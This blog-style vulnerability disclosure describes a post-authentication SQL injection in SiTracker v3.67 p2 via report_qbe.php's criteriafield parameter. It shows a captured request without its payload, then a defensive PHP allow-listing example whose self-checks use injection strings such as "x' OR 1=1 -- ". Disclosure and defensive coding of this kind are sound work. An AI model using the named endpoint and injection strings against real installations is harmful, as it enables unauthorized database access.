Thursday, 25 June 2020

Postauth SQLi in SiTracker v3.67 p2

A few days ago I tried another VM from TurnKeyLinux - SiTracker (v3.67 p2). Below you will find a few notes from the journey. Here we go...

This time we'll start here:

TL;DR - I thought that this (3.67 p2) version is "the new" one - and indeed it is. But afaik it has never been updated since 2013... ;) So, yeah. "The latest" ;D Anyway... ;]

The SQLi bug described below is ("mostly focused" ;)) on the admin part of the webapp. A few reasons why are shown on the screens below:

a) site_edit.php -> typeid, site

b) search_incidents_advanced.php -> search_title

... cleanvar() function in action:

... and so on. ;) So let's get back to our SQL injection for a logged-in admin user:

c) report_qbe.php -> param criteriafield:

More precisely:

DIY version for your private legal CTFs only ;)

c@kali:~$ cat test1.txt
POST /report_qbe.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Connection: close
Cookie: sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; Accounts_divs=Accounts_documents_v%3Dtrue%23undefined%3D%23Accounts_accounts_v%3Dtrue%23Accounts_project_v%3Dtrue%23; AOR_Reports_divs=AOR_Reports_aor_scheduled_reports_aor_reports_v%3Dtrue%23undefined%3D%23; PHPSESSID=7a4rcc45nracu0s7vg2alnqeq1; ZMSESSID=nh054rbcptbu3svclu3dbqpvi1; SiTsessionID=fkum2is1ac6m4nit7o7erge8g7
Upgrade-Insecure-Requests: 1

c@kali:~$ ^C
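For the defender side, here is an added example (my own code, not SiTracker's and not its cleanvar() helper) of how a parameter like criteriafield should be handled in report_qbe.php: a field name that ends up as an SQL identifier cannot be bound as a prepared-statement parameter, so it is matched against an allow-list, while the compared value is left to binding. The column names, the incidents table and the criteriavalue parameter are assumptions for illustration, not SiTracker's real schema.

```php
<?php
// Added example, not SiTracker code. Assumption: criteriafield names a column of a
// WHERE clause built by report_qbe.php, and criteriavalue is the value compared to it.
// Identifiers are allow-listed; values go through a '?' placeholder and are bound later.

const ALLOWED_CRITERIA_FIELDS = ['id', 'title', 'priority', 'status', 'owner'];

function safe_criteria_field(string $field): string
{
    // Strict comparison: anything not literally in the list is rejected and logged,
    // so a hostile field name is never concatenated into the query.
    if (!in_array($field, ALLOWED_CRITERIA_FIELDS, true)) {
        error_log('report_qbe: rejected criteriafield ' . json_encode($field));
        throw new InvalidArgumentException('invalid criteriafield');
    }
    return '`' . $field . '`';
}

// Returns [sql, params]; the value is never interpolated into the SQL string.
function build_report_query(string $field, string $value): array
{
    $column = safe_criteria_field($field);
    return ["SELECT id, title FROM incidents WHERE $column = ?", [$value]];
}

// How the pair is consumed with mysqli (assumed connection $db; not called in the self-check).
function run_report(mysqli $db, string $field, string $value): array
{
    [$sql, $params] = build_report_query($field, $value);
    $stmt = $db->prepare($sql);
    $stmt->bind_param('s', $params[0]);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Self-check with constructed inputs, no database needed.
[$sql, $params] = build_report_query('title', "x' OR 1=1 -- ");
assert($sql === 'SELECT id, title FROM incidents WHERE `title` = ?');
assert($params === ["x' OR 1=1 -- "]);   // value stays a parameter, not SQL

try {
    build_report_query('title` OR 1=1 -- ', 'x');
    assert(false, 'hostile field name should have been rejected');
} catch (InvalidArgumentException $e) {
    echo "rejected hostile criteriafield, as intended\n";
}
```

The error_log line doubles as a detection hook: repeated rejections for one session are a cheap signal that someone is probing the report form.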

You'll find it here:

Maybe you'll find it useful. ;]

Special thanks goes to my Patreon: Daniel.
You are AWESOME! ;)

See you next time!

